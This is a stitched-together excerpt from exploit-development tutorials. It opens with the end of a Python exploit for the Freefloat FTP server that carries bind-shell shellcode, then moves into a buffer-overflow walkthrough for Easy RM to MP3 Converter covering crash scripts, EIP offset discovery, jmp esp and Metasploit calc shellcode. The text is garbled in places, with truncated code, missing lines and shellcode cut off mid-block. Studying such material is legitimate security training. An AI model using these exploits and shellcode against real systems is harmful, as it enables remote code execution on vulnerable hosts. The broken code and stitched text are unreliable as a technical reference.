"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";
After prettifying the code a bit and adding the relevant notes the final exploit is ready.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 2 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/2.html #
#----------------------------------------------------------------------------------#
# #
import socket
import sys
#----------------------------------------------------------------------------------#
#----------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
In the screenshot below we can see the before and after output of the “netstat -an” command
and below that we have the backtrack terminal output when we connect to our bind shell.
Game Over!!
Shell
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
https://www.fuzzysecurity.com/tutorials/expDev/2.html
ast friday (july 17th 2009), somebody (nick)named ‘Crazy_Hacker’ has reported a vulnerability
in Easy RM to MP3 Conversion Utility (on XP SP2 En), via packetstormsecurity.org.
(see http://packetstormsecurity.org/0907-exploits/). The vulnerability report included a proof
of concept exploit (which, by the way, failed to work on my MS Virtual PC based XP SP3
En). Another exploit was released just a little bit later.
Nice work. You can copy the PoC exploit code, run it, see that it doesn’t work (or if you are
lucky, conclude that it works), or… you can try to understand the process of building the
exploit so you can correct broken exploits, or just build your own exploits from scratch.
(By the way : unless you can disassemble, read and comprehend shellcode real fast, I would
never advise you to just take an exploit (especially if it’s a precompiled executable) and run
it. What if it’s just built to open a backdoor on your own computer ?
The question is : How do exploit writers build their exploits ? What does the process of going
from detecting a possible issue to building an actual working exploit look like ? How can you
use vulnerability information to build your own exploit ?
Ever since I’ve started this blog, writing a basic tutorial about writing buffer overflows has
been on my “to do” list… but I never really took the time to do so (or simply forgot about it).
When I saw the vulnerability report today, and had a look at the exploit, I figured this
vulnerability report could acts as a perfect example to explain the basics about writing
exploits… It’s clean, simple and allows me to demonstrate some of the techniques that are
used to write working and stable stack based buffer overflows.
So perhaps this is a good time… Despite the fact that the forementioned vulnerability report
already includes an exploit (working or not), I’ll still use the vulnerability in “Easy RM to MP3
conversion utility” as an example and we’ll go through the steps of building a working exploit,
without copying anything from the original exploit. We’ll just build it from scratch (and make it
work on XP SP3 this time :) )
Before we continue, let me get one thing straight. This document is purely intended for
educational purposes. I do not want anyone to use this information (or any information on this
blog) to actually hack into computers or do other illegal things. So I cannot be held responsible
for the acts of other people who took parts of this document and used it for illegal purposes. If
you don’t agree, then you are not allowed to continue to access this website… so leave this
website immediately.
Anyways, that having said, the kind of information that you get from vulnerability reports
usually contains information on the basics of the vulnerability. In this case, the vulnerability
report states “Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit
that creates a malicious .m3u file”. In other words, you can create a malicious .m3u file, feed it
into the utility and trigger the exploit. These reports may not be very specific every time, but in
most cases you can get an idea of how you can simulate a crash or make the application
behave weird. If not, then the security researcher probably wanted to disclose his/her findings
first to the vendor, give them the opportunity to fix things… or just wants to keep the intel for
him/herself…
First of all, let’s verify that the application does indeed crash when opening a malformatted
m3u file. (or find yourself an application that crashes when you feed specifically crafted data to
it).
Get yourself a copy of the vulnerable version of Easy RM to MP3 and install it on a computer
running Windows XP. The vulnerability report states that the exploit works on XP SP2 (English),
but I’ll use XP SP3 (English).
Quick sidenote : you can find older versions of applications at oldapps.com and oldversion.com,
or by looking at exploits on exploit-db.com (which often have a local copy of the vulnerable
application as well)
We’ll use the following simple perl script to create a .m3u file that may help us to discover
more information about the vulnerability :
my $file= "crash.m3u";
open($FILE,">$file");
close($FILE);
Run the perl script to create the m3u file. The fill will be filled with 10000 A’s (\x41 is the
hexadecimal representation of A) and open this m3u file with Easy RM to MP3…. The
application throws an error, but it looks like the error is handled correctly and the application
does not crash. Modify the script to write a file with 20000 A’s and try again. Same
behaviour. (exception is handled correctly, so we still could not overwrite anything usefull).
Now change the script to write 30000 A’s, create the m3u file and open it in the utility.
Obviously, not every application crash can lead to an exploitation. In many cases, an
application crash will not lead to exploitation… But sometimes it does. With “exploitation”, I
mean that you want the application to do something it was not intended to do… such as
running your own code. The easiest way to make an application do something different is by
controlling its application flow (and redirect it to somewhere else). This can be done by
controlling the Instruction Pointer (or Program Counter), which is a CPU register that contains
a pointer to where the next instruction that needs to be executed is located.
Suppose an application calls a function with a parameter. Before going to the function, it saves
the current location in the instruction pointer (so it knows where to return when the function
completes). If you can modify the value in this pointer, and point it to a location in memory
that contains your own piece of code, then you can change the application flow and make it
execute something different (other than returning back to the original place). The code that
you want to be executed after controlling the flow is often referred to as “shellcode”. So if we
make the application run our shellcode, we can call it a working exploit. In most cases, this
pointer is referenced by the term EIP. This register size is 4 bytes. So if you can modify those 4
bytes, you own the application (and the computer the application runs on)
Every Windows application uses parts of memory. The process memory contains 3 major
components :
• code segment (instructions that the processor executes. The EIP keeps track of the
next instruction)
• stack segment (used to pass data/arguments to functions, and is used as space for
variables. The stack starts (= the bottom of the stack) from the very end of the virtual
memory of a page and grows down (to a lower address). a PUSH adds something to
the top of the stack, POP will remove one item (4 bytes) from the stack and puts it in a
register.
If you want to access the stack memory directly, you can use ESP (Stack Pointer), which points
at the top (so the lowest memory address) of the stack.
• After a push, ESP will point to a lower memory address (address is decremented with
the size of the data that is pushed onto the stack, which is 4 bytes in case of
addresses/pointers). Decrements usually happen before the item is placed on the
stack (depending on the implementation… if ESP already points at the next free
location in the stack, the decrement happens after placing data on the stack)
• After a POP, ESP points to a higher address (address is incremented (by 4 bytes in case
of addresses/pointers)). Increments happen after an item is removed from the stack.
When a function/subroutine is entered, a stack frame is created. This frame keeps the
parameters of the parent procedure together and is used to pass arguments to the
subrouting. The current location of the stack can be accessed via the stack pointer (ESP), the
current base of the function is contained in the base pointer (EBP) (or frame pointer).
• EAX : accumulator : used for performing calculations, and used to store return values
from function calls. Basic operations such as add, subtract, compare use this general-
purpose register
• EBX : base (does not have anything to do with base pointer). It has no general purpose
and can be used to store data.
• EDX : data : this is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.
• EDI : destination index : points to location of where result of data operation is stored
Process Memory
When a process is created, a PEB (Process Execution Block) and TEB (Thread Environment
Block) are created.
The PEB contains all user land parameters that are associated with the current process :
• pointer to loader data (can be used to list all dll’s / modules that are/can be loaded
into the process)
• pointer to the first entry in the SEH chain (see tutorial 3 and 3b to learn more about
what a SEH chain is)
The text segment of a program image / dll is readonly, as it only contains the application code.
This prevents people from modifying the application code. This memory segment has a fixed
size. The data segment is used to store global and static program variables. The data segment
is used for initialized global variables, strings, and other constants.
The data segment is writable and has a fixed size. The heap segment is used for the rest of the
program variables. It can grow larger or smaller as desired. All of the memory in the heap is
managed by allocator (and deallocator) algorithms. A memory region is reserved by these
algo’s. The heap will grow towards a higher addresses.
In a dll, the code, imports (list of functions used by the dll, from another dll or application), and
exports (functions it makes available to other dll’s applications) are part of the .text segment.
The Stack
The stack is a piece of the process memory, a data structure that works LIFO (Last in first out).
A stack gets allocated by the OS, for each thread (when the thread is created). When the
thread ends, the stack is cleared as well. The size of the stack is defined when it gets created
and doesn’t change. Combined with LIFO and the fact that it does not require complex
management structures/mechanisms to get managed, the stack is pretty fast, but limited in
size.
LIFO means that the most recent placed data (result of a PUSH instruction) is the first one that
will be removed from the stack again. (by a POP instruction).
When a stack is created, the stack pointer points to the top of the stack ( = the highest address
on the stack). As information is pushed onto the stack, this stack pointer decrements (goes to a
lower address). So in essence, the stack grows to a lower address.
The stack contains local variables, function calls and other info that does not need to be stored
for a larger amount of time. As more data is added to the stack (pushed onto the stack), the
stack pointer is decremented and points at a lower address value.
Every time a function is called, the function parameters are pushed onto the stack, as well as
the saved values of registers (EBP, EIP). When a function returns, the saved value of EIP is
retrieved from the stack and placed back in EIP, so the normal application flow can be
resumed.
#include
char MyVar[128];
strcpy(MyVar,Buffer);
do_something(argv[1]);
}
(You can compile this code. Get yourself a copy of Dev-C++ 4.9.9.2, create a new Win32 console
project (use C as language, not C++), paste the code and compile it). On my system, I called the
project “stacktest”.
This applications takes an argument (argv[1] and passes the argument to function
do_something(). In that function, the argument is copied into a local variable that has a
maximum of 128 bytes. So… if the argument is longer than 127 bytes (+ a null byte to
terminate the string), the buffer may get overflown.
When function “do_something(param1)” gets called from inside main(), the following things
happen :
A new stack frame will be created, on top of the ‘parent’ stack. The stack pointer (ESP) points
to the highest address of the newly created stack. This is the “top of the stack”.
Before do_something() is called, a pointer to the argument(s) gets pushed to the stack. In our
case, this is a pointer to argv[1].
Stack after the MOV instruction :
Next, function do_something is called. The CALL instruction will first put the current
instruction pointer onto the stack (so it knows where to return to if the function ends) and will
then jump to the function code.
As a result of the push, ESP decrements 4 bytes and now points to a lower address.
(or, as seen in a debugger) :
ESP points at 0022FF5C. At this address, we see the saved EIP (Return to…), followed by a
pointer to the parameter (AAAA in this example). This pointer was saved on the stack before
the CALL instruction was executed.
Next, the function prolog executes. This basically saves the frame pointer (EBP) onto the stack,
so it can be restored as well when the function returns. The instruction to save the frame
pointer is “push ebp”. ESP is decremented again with 4 bytes.
Following the push ebp, the current stack pointer (ESP) is put in EBP. At that point, both ESP
and EBP point at the top of the current stack. From that point on, the stack will usually be
referenced by ESP (top of the stack at any time) and EBP (the base pointer of the current
stack). This way, the application can reference variables by using an offset to EBP.
Most functions start with this sequence : PUSH EBP, followed by MOV EBP,ESP
So, if you would push 4 bytes to the stack, ESP would decrement with 4 bytes and EBP would
still stay where it was. You can then reference these 4 bytes using EBP-0x4.
Next, we can see how stack space for the variable MyVar (128bytes) is declared/allocated. In
order to hold the data, some space is allocated on the stack to hold data in this variable… ESP
is decremented by a number of bytes. This number of bytes wil most likely be more than 128
bytes, because of an allocation routine determined by the compiler. In the case of Dev-C++,
this is 0x98 bytes. So you will see a SUB ESP,0x98 instruction. That way, there will be space
available for this variable.
The disassembly of the function looks like this :
004012AE |. C9 LEAVE
004012AF \. C3 RETN
(don’t worry about the code too much. You can clearly see the function prolog (PUSH EBP and
MOV EBP,ESP), you can also see where space gets allocated for MyVar (SUB ESP,98), and you
can see some MOV and LEA instructions (which basically set up the parameters for the strcpy
function… taking the pointer where argv[1] sits and using it to copy data from, into MyVar.
If there would not have been a strcpy() in this function, the function would now end and
“unwind” the stack. Basically, it would just move ESP back to the location where saved EIP was,
and then issues a RET instruction. A ret, in this case, will pick up the saved EIP pointer from
the stack and jump to it. (thus, it will go back to the main function, right after where
do_something() was called). The epilog instruction is executed by a LEAVE instruction (which
will restore both the framepointer and EIP).
This function will read data, from the address pointed to by [Buffer], and store it in , reading all
data until it sees a null byte (string terminator). While it copies the data, ESP stays where it
is. The strcpy() does not use PUSH instructions to put data on the stack… it basically reads a
byte and writes it to the stack, using an index (for example ESP, ESP+1, ESP+2, etc). So after the
copy, ESP still points at the begin of the string.
That means… If the data in [Buffer] is somewhat longer than 0x98 bytes, the strcpy() will
overwrite saved EBP and eventually saved EIP (and so on). After all, it just continues to read &
write until it reaches a null byte in the source location (in case of a string)
ESP still points at the begin of the string. The strcpy() completes as if nothing is wrong. After
the strcpy(), the function ends. And this is where things get interesting. The function epilog
kicks in. Basically, it will move ESP back to the location where saved EIP was stored, and it will
issue a RET. It will take the pointer (AAAA or 0x41414141 in our case, since it got overwritten),
and will jump to that address.
Long story short, by controlling EIP, you basically change the return address that the function
will uses in order to “resume normal flow”.
Of course, if you change this return address by issuing a buffer overflow, it’s not a “normal
flow” anymore.
So… Suppose you can overwrite the buffer in MyVar, EBP, EIP and you have A’s (your own
code) in the area before and after saved EIP… think about it. After sending the buffer
([MyVar][EBP][EIP][your code]), ESP will/should point at the beginning of [your code]. So if you
can make EIP go to your code, you’re in control.
Note : when a buffer on the stack overflows, the term “stack based overflow” or “stack buffer
overflow” is used. When you are trying to write past the end of the stack frame, the term “stack
overflow” is used. Don’t mix those two up, as they are entirely different.
The debugger
In order to see the state of the stack (and value of registers such as the instruction pointer,
stack pointer etc), we need to hook up a debugger to the application, so we can see what
happens at the time the application runs (and especially when it dies).
There are many debuggers available for this purpose. The two debuggers I use most often are
Windbg, and Immunity’s Debugger
Let’s use Windbg. Install Windbg (Full install) and register it as a “post-mortem” debugger
using “windbg -I”.
You can also disable the “xxxx has encountered a problem and needs to close” popup by
setting the following registry key :
In order to avoid Windbg complaining about Symbol files not found, create a folder on your
harddrive (let’s say c:\windbgsymbols). Then, in Windbg, go to “File” – “Symbol File Path” and
enter the following string :
SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
(do NOT put an empty line after this string ! make sure this string is the only string in the
symbol path field)
If you want to use Immunity Debugger instead : get a copy here and install it. Open Immunity
debugger, go to “Options” – “Just in-time debugging” and click “Make Immunity Debugger just
in-time debugger”.
Launch Easy RM to MP3, and then open the crash.m3u file again. The application will crash
again. If you have disabled the popups, windbg or Immunity debugger will kick in
automatically. If you get a popup, click the “debug” button and the debugger will be launched :
Windbg :
Immunity :
This GUI shows the same information, but in a more…errr.. graphical way. In the upper left
corner, you have the CPU view, which shows assembly instructions and their opcodes. (the
window is empty because EIP currently points at 41414141 and that’s not a valid address). In
the upper right windows, you can see the registers. In the lower left corner, you see the
memory dump of 00446000 in this case. In the lower right corner, you can see the contents of
the stack (so the contents of memory at the location where ESP points at).
Anyways, in both cases, we can see that the instruction pointer contains 41414141, which is
the hexidecimal representation for AAAA.
A quick note before proceeding : On intel x86, the addresses are stored little-endian (so
backwards). The AAAA you are seeing is in fact AAAA :-) (or, if you have sent ABCD in your
buffer, EIP would point at 44434241 (DCBA)
So it looks like part of our m3u file was read into the buffer and caused the buffer to
overflow. We have been able to overflow the buffer and write across the instruction
pointer. So we may be able to control the value of EIP.
Since our file does only contain A’s, we don’t know exactly how big our buffer needs to be in
order to write exactly into EIP. In other words, if we want to be specific in overwriting EIP (so
we can feed it usable data and make it jump to our evil code, we need to know the exact
position in our buffer/payload where we overwrite the return address (which will become EIP
when the function returns). This position is often referred to as the “offset”.
We know that EIP is located somewhere between 20000 and 30000 bytes from the beginning
of the buffer. Now, you could potentially overwrite all memory space between 20000 and
30000 bytes with the address you want to overwrite EIP with. This may work, but it looks much
more nice if you can find the exact location to perform the overwrite. In order to determine
the exact offset of EIP in our buffer, we need to do some additional work.
First, let’s try to narrow down the location by changing our perl script just a little :
Let’s cut things in half. We’ll create a file that contains 25000 A’s and another 5000 B’s. If EIP
contains an 41414141 (AAAA), EIP sits between 20000 and 25000, and if EIP contains
42424242 (BBBB), EIP sits between 25000 and 30000.
my $file= "crash25000.m3u";
open($FILE,">$file");
close($FILE);
Buffer :
[ 5000 B's ]
[AAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBB][BBBB][BBBBBBBBB......]
0:000> d esp
0:000> d
0:000> d
000ff830 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
That is great news. We have overwritten EIP with BBBB and we can also see our buffer in ESP.
Before we can start tweaking the script, we need to find the exact location in our buffer that
overwrites EIP.
Metasploit has a nice tool to assist us with calculating the offset. It will generate a string that
contains unique patterns. Using this pattern (and the value of EIP after using the pattern in our
malicious .m3u file), we can see how big the buffer should be to write exactly into EIP.
Open the tools folder in the metasploit framework3 folder (I’m using a linux version of
metasploit 3). You should find a tool called pattern_create.rb. Create a pattern of 5000
characters and write it into a file
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb
Edit the perl script and replace the content of $junk2 with our 5000 characters.
my $file= "crash25000.m3u";
open($FILE,">$file");
close($FILE);
Create the m3u file. open this file in Easy RM to MP3, wait until the application dies again, and
take note of the contents of EIP
At this time, eip contains 0x356b4234 (note : little endian : we have overwritten EIP with 34 42
6b 35 = 4Bk5
Let’s use a second metasploit tool now, to calculate the exact length of the buffer before
writing into EIP, feed it with the value of EIP (based on the pattern file) and length of the buffer
:
1094
root@bt:/pentest/exploits/framework3/tools#
1094. That’s the buffer length needed to overwrite EIP. So if you create a file with 25000+1094
A’s, and then add 4 B’s (42 42 42 42 in hex) EIP should contain 42 42 42 42. We also know that
ESP points at data from our buffer, so we’ll add some C’s after overwriting EIP.
Let’s try. Modify the perl script to create the new m3u file.
my $file= "eipcrash.m3u";
my $eip = "BBBB";
open($FILE,">$file");
close($FILE);
Create eipcrash.m3u, open it in Easy RM to MP3, observe the crash and look at eip and the
contents of the memory at ESP:
0:000> d esp
In Immunity Debugger, you can see the contents of the stack, at ESP, by looking at the lower
right hand window.
Excellent. EIP contains BBBB, which is exactly what we wanted. So now we control EIP. On top
of that, ESP points to our buffer (C’s)
Note : the offset shown here is the result of the analysis on my own system. If you are trying to
reproduce the exercises from this tutorial on your own system, odds are high that you will get a
different offset address. So please don’t just take the offset value or copy the source code to
your system, as the offset is based on the file path where the m3u file is stored. The buffer that
is vulnerable to an overflow includes the full path to the m3u file. So if the path on your system
is shorter or larger than mine, then the offset will be different.
We control EIP. So we can point EIP to somewhere else, to a place that contains our own code
(shellcode). But where is this space, how can we put our shellcode in that location and how
can we make EIP jump to that location ?
In order to crash the application, we have written 26094 A’s into memory, we have written a
new value into the saved EIP field (ret), and we have written a bunch of C’s.
When the application crashes, take a look at the registers and dump all of them (d esp, d eax,
d ebx, d ebp, …). If you can see your buffer (either the A’s or the C’s) in one of the registers,
then you may be able to replace those with shellcode and jump to that location. In our
example, We can see that ESP seems to point to our C’s (remember the output of d esp
above), so ideally we would put our shellcode instead of the C’s and we tell EIP to go to the
ESP address.
Despite the fact that we can see the C’s, we don’t know for sure that the first C (at address
000ff730, where ESP points at), is in fact the first C that we have put in our buffer.
We’ll change the perl script and feed a pattern of characters (I’ve taken 144 characters, but
you could have taken more or taken less) instead of C’s :
my $file= "test1.m3u";
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
close($FILE);
Create the file, open it, let the application die and dump memory at location ESP :
0:000> d esp
0:000> d
• ESP starts at the 5th character of our pattern, and not the first character. (due to
calling conventions, the child function will clean up stack space used by the parent
function when it passed an argument to the child function)
• After the pattern string, we see “A’s”. These A’s most likely belong to the first part of
the buffer (26101 A’s), so we may also be able to put our shellcode in the first part of
the buffer (before overwriting RET)…
But let’s not go that way yet. We’ll first add 4 characters in front of the pattern and do the test
again. If all goes well, ESP should now point directly at the beginning of our pattern :
my $file= "test1.m3u";
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
close($FILE);
0:000> d esp
0:000> d
Much better !
We now have
• an area where we can write our code (at least 144 bytes large. If you do some more
tests with longer patterns, you will see that you have even more space… plenty of
space in fact)
Now we need to
• tell EIP to jump to the address of the start of the shellcode. We can do this by
overwriting EIP with 0x000ff730.
Let’s see
We’ll build a small test case : first 26094 A’s, then overwrite EIP with 000ff730, then put 25
NOP’s, then a break, and then more NOP’s.
If all goes well, EIP should jump 000ff730, which contains NOPs. The code should slide until the
break.
my $file= "test1.m3u";
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
open($FILE,">$file");
close($FILE);
+0xff71f:
0:000> d esp
So jumping directly to a memory address may not be a good solution after all. (000ff730
contains a null byte, which is a string terminator… so the A’s you are seeing are coming from
the first part of the buffer… We never reached the point where we started writing our data
after overwrite EIP…
Besides, using a memory address to jump to in an exploit would make the exploit very
unreliable. After all, this memory address could be different in other OS versions, languages,
etc…)
Long story short : we cannot just overwrite EIP with a direct memory address such as 000ff730.
It’s not a good idea because it would not be reliable, and it’s not a good idea because it
contains a null byte. We have to use another technique to achieve the same goal : make the
application jump to our own provided code. Ideally, we should be able to reference a register
(or an offset to a register), ESP in our case, and find a function that will jump to that
register. Then we will try to overwrite EIP with the address of that function and it should be
time for pancakes and icecream.
We have managed to put our shellcode exactly where ESP points at (or, if you look at it from a
different angle, ESP points directly at the beginning of our shellcode). If that would not have
been the case, we would have looked to the contents of other register addresses and hope to
find our buffer back. Anyways, in this particular example, we can use ESP.
The reasoning behind overwriting EIP with the address of ESP was that we want the
application to jump to ESP and run the shellcode.
Jumping to ESP is a very common thing in windows applications. In fact, Windows applications
use one or more dll’s, and these dll’s contains lots of code instructions. Furthermore, the
addresses used by these dll’s are pretty static. So if we could find a dll that contains the
instruction to jump to esp, and if we could overwrite EIP with the address of that instruction in
that dll, then it should work, right ?
Let’s see. First of all, we need to figure out what the opcode for “jmp esp” is.
We can do this by Launching Easy RM to MP3, then opening windbg and hook windbg to the
Easy RM to MP3 application. (Just connect it to the process, don’t do anything in Easy RM to
MP3). This gives us the advantage that windbg will see all dll’s/modules that are loaded by the
application. (It will become clear why I mentioned this)
Upon attaching the debugger to the process, the application will break.
In the windbg command line, at the bottom of the screen, enter a (assemble) and press
return
Now enter u (unassemble) followed by the address that was shown before entering jmp esp
0:014> u 7c90120e
ntdll!DbgBreakPoint:
ntdll!DbgUserBreakPoint:
7c901212 cc int 3
7c901213 c3 ret
7c90121a cc int 3
Next to 7c90120e, you can see ffe4. This is the opcode for jmp esp
Look at the top of the windbg window, and look for lines that indicate dll’s that belong to the
Easy RM to MP3 application :
****************************************************************************
****************************************************************************
If we can find the opcode in one of these dll’s, then we have a good chance of making the
exploit work reliably across windows platforms. If we need to use a dll that belongs to the OS,
then we might find that the exploit does not work for other versions of the OS. So let’s search
the area of one of the Easy RM to MP3 dll’s first.
“s 70000000 l fffffff ff e4” (which would typically give results from windows dll’s)
• findjmp (from Ryan Permeh) : compile findjmp.c and run with the following
parameters :
findjmp . Suppose you want to look for jumps to esp in kernel32.dll, run “findjmp kernel32.dll
esp”
Findjmp2, Hat-Squad
Finished Scanning kernel32.dll for code useable with the esp register
• pvefindaddr, a plugin for Immunity Debugger. In fact, this one is highly recommended
because it will automatically filter unreliable pointers.
Since we want to put our shellcode in ESP (which is placed in our payload
string after overwriting EIP), the jmp esp address from the list must not have null bytes. If this
address would have null bytes, we would overwrite EIP with an address that contains null
bytes. Null byte acts as a string terminator, so everything that follows would be ignored. In
some cases, it would be ok to have an address that starts with a null byte. If the address starts
with a null byte, because of little endian, the null byte would be the last byte in the EIP
register. And if you are not sending any payload after overwrite EIP (so if the shellcode is fed
before overwriting EIP, and it is still reachable via a register), then this will work.
Anyways, we will use the payload after overwriting EIP to host our shellcode, so the address
should not contain null bytes.
Verify that this address contains the jmp esp (so unassemble the instruction at 01ccf23a):
0:014> u 01ccf23a
MSRMCcodec02!CAudioOutWindows::WaveOutWndProc+0x8bfea:
01ccf244 ff ???
01ccf245 ff ???
01ccf246 ff ???
01ccf247 ff ???
If we now overwrite EIP with 0x01ccf23a, a jmp esp will be executed. Esp contains our
shellcode… so we should now have a working exploit. Let’s test with our “NOP & break”
shellcode.
Close windbg.
my $file= "test1.m3u";
my $eip = pack('V',0x01ccf23a);
$shellcode = $shellcode."\xcc"; #this will cause the application to break, simulating shellcode,
but allowing you to further debug
open($FILE,">$file");
close($FILE);
(21c.e54): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff734:
000ff745 cc int 3
0:000> d esp
Run the application again, attach windbg, press “g” to continue to run, and open the new m3u
file in the application.
The application now breaks at address 000ff745, which is the location of our first break. So the
jmp esp worked fine (esp started at 000ff730, but it contains NOPs all the way up to 000ff744).
All we need to do now is put in our real shellcode and finalize the exploit.
Metasploit has a nice payload generator that will help you building shellcode. Payloads come
with various options, and (depending on what they need to do), can be small or very large. If
you have a size limitation in terms of buffer space, then you might even want to look at multi-
staged shellcode, or using specifically handcrafted shellcodes such as this one (32byte cmd.exe
shellcode for xp sp2 en). Alternatively, you can split up your shellcode in smaller ‘eggs’ and use
a technique called ‘egg-hunting’ to reassemble the shellcode before executing it. Tutorial 8 and
10 talk about egg hunting and omelet hunters.
Let’s say we want calc to be executed as our exploit payload, then the shellcode could look like
this :
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
# http://www.corelan.be
my $file= "exploitrmtomp3.m3u";
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
